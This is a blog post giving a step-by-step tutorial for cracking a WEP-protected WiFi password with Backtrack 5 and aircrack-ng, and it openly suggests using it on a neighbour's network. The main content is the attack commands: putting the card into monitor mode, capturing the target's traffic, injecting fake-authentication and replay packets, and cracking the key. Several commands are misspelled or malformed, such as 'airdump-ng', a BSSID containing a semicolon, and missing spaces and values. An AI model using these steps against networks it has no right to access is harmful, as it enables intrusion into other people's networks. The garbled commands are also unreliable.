hacking wifi using backtrack - Hacking

Hot

Post Top Ad

Your Ad Spot

Monday 18 March 2019

hacking wifi using backtrack




Hacking a WiFi network with Backtrack is quite simple all you have to do is enter certain commands and you are done..In one of my previous post i told you how you can hack and Crack WiFi Password using hydra. Keep in mind that in order to Crack WiFi Password you will need lots of patience,so just be patience and you will be able to crack WiFi password of your neighbor :)
In this tutorial we will be using Backtrack 5 to crack WiFi password.

NOTE: This Tutorial Is For Education Purpose Only Don’t Misuse It,We Will Not Hold Any Responsibility If It Is Being Misused !


Requirements:

Here is what you would require to crack a WEP key:
1. Backtrack or any other Linux distro with aircrack-ng installed
2. A Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack
You can find compatible wifi card lists HERE
You May Also Like:

Now, follow these Steps :

Step 1:

Login to your Backtrack linux and plug in the Wifi adapter,then open the new consol and start typing the following commands:

ifconfig wlan0 up

Here wlan0 is the name of wireless card ,it may be different for your case.To see all the connected cards to your system simply type" iwconfig " or you can find it by typing " airmon-ng ".airmon-ng

Step 2:

You have to put your wireless adapter into monitor mode,to do so type the following command:

airmon-ng start (your interface)

Example: airmon-ng start wlan0
Now when the new interface mon0 will be created you can see the new interface by typing " iwconfig mon0 "
Backtrack 5
Backtrack 5

Step 3:

Now you will need to find the WEP network around you,you can do it by typing the following command:

airdump-ng mon0

After typing the coomand you will see all the available WIFI
Backtrack 5

In this,Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type.
Look for the WEP protected network in this tutorial we are taking "pack" as my target.
Backtrack 5

Step 4:

In order to carck the WEP you will need to capture all the data of the target into file.To do this type the folllowing command and you need to speed up the process too.

airodump-ng mon0 --bssid -c (channel ) -w (file name to save )

Backtrack 5
In my case channel is 6 and has bssid as 00:26:75:06:CF;C6 and i am going to save the captured data  as "wep".
Backtrack 5

Step 5:

In order to speed up the capturing rate open the new terminal and type:

aireplay-ng - 1 3 -a (bssid of the target ) (interface)

Backtrack 5
in my case:
aireplay-ng - 1 3 -a 00:26:75:06:CF;C6 mon0
now type the following command:

aireplay-ng-2-p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid of target)  (interface)

and press "y" when asked to Use this Packet.

Backtrack 5
Backtrack 5
in my case :
aireplay-ng-2-p 0841 -c ff:ff:ff:ff:ff:ff -b 00:26:75:06:CF;C6 ) mon0
Backtrack 5

Step 6:

Open new terminal and type

aircrack-ng -n 64 -b (bssid) saved file

Backtrack 5

in my case :
aircrack-ng -n 64 -b00:26:75:06:CF;C6 wep
Backtrack 5
Once the cracking is successful you will be given Key,just remove the inbetween colons from the key and use it.

No comments:

Post a Comment